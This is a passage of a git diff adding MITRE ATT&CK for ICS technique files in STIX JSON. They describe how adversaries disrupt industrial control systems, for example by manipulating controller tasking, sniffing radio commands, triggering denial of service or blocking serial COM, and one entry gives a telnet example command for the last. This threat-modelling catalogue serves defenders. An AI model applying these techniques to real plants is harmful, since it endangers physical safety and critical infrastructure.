"mitre-attack", + "url": "https://attack.mitre.org/techniques/T0836", + "external_id": "T0836" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243.json new file mode 100644 index 0000000000000000000000000000000000000000..f0edb10010a686419fbabbc504ad78d7e72a7b6b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--0e6b28a8-6cb3-4ca7-b7f5-e8f48370d7d9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Controller Tasking", + "description": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. \n\nAccording to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.\n\nTasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Application Log: Application Log Content", + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0821", + "external_id": "T0821" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72.json new file mode 100644 index 0000000000000000000000000000000000000000..5f8ba3294d66c45bd030237e3fcceb00c2859904 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--d80c9623-be6d-4f18-8399-27168ac87c6c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Wireless Sniffing", + "description": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. \n\nAdversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) \n\nIn the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ICSCoE Japan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0887", + "external_id": "T0887" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018", + "description": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01 ", + "url": "https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf" + }, + { + "source_name": "Gallagher, S. April 2017", + "description": "Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 2020/12/01 ", + "url": "https://arstechnica.com/information-technology/2017/04/dallas-siren-hack-used-radio-signals-to-spoof-alarm-says-city-manager/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36.json new file mode 100644 index 0000000000000000000000000000000000000000..386784c4e25d54d582bbac6edfea677673a25ca4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--cd36473f-7242-4c74-b703-3fb353ddab2b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of View", + "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0829", + "external_id": "T0829" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--19a71d1e-6334-4233-8260-b749cae37953.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--19a71d1e-6334-4233-8260-b749cae37953.json new file mode 100644 index 0000000000000000000000000000000000000000..d93a2acf2543487728f49430a33e590649dc5343 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--19a71d1e-6334-4233-8260-b749cae37953.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--e2e8cb6c-3007-4282-91c2-120c590e5f67", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1.json new file mode 100644 index 0000000000000000000000000000000000000000..a62fc583fdecece2cc6da986efb389b70e1ba953 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--3d498eba-2090-415d-8881-5bc8e1291d23", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of Control", + "description": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. \n\nMethods of Manipulation of Control include: \n\n* Man-in-the-middle \n* Spoof command message \n* Changing setpoints \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0831", + "external_id": "T0831" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b.json new file mode 100644 index 0000000000000000000000000000000000000000..e5ec4f631c107a47b75372da971c14a01976d5f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--0f449267-8ddf-4d23-b45f-46ea033e1e4c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:16:01.922Z", + "name": "Denial of Service", + "description": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. \n\nSome ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) \n\nAdversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. \n\nAdversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0814", + "external_id": "T0814" + }, + { + "source_name": "Common Weakness Enumeration January 2019", + "description": "Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource Consumption Retrieved. 2019/03/14 ", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "source_name": "ICS-CERT April 2017", + "description": "ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01" + }, + { + "source_name": "MITRE March 2018", + "description": "MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14 ", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5374" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60.json new file mode 100644 index 0000000000000000000000000000000000000000..8c82a82f6f61e7c1c298b199d98c051cf9edc96c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--171b7d8c-480a-4d85-8ae1-5f1a0a9bc9ae", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T21:02:54.674Z", + "name": "Block Serial COM", + "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Process/Event Alarm", + "Process: Process Termination", + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0805", + "external_id": "T0805" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80.json new file mode 100644 index 0000000000000000000000000000000000000000..25ac6587e7b0045cc0aa81c8740a94a8922b0c2e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--9495669c-3044-4946-bb5a-3abef44ed2fa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Role Identification", + "description": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.\n\nFor example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0850", + "external_id": "T0850" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c.json new file mode 100644 index 0000000000000000000000000000000000000000..e5a09aa36578eceec33a0ebb513ba8ec664445ac --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--480dd457-058d-4688-92ba-087bed09a32e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command-Line Interface", + "description": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Application Log: Application Log Content", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0807", + "external_id": "T0807" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1059" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1.json new file mode 100644 index 0000000000000000000000000000000000000000..fc41cd44096800e0b497163dc2500c59c4088353 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--796df28e-687e-4ffe-b3dc-37c73c0b3b84", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Point & Tag Identification", + "description": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. \n\nCollecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Data Historian", + "Control Server", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0861", + "external_id": "T0861" + }, + { + "source_name": "Dennis L. Sloatman September 2016", + "description": "Dennis L. Sloatman 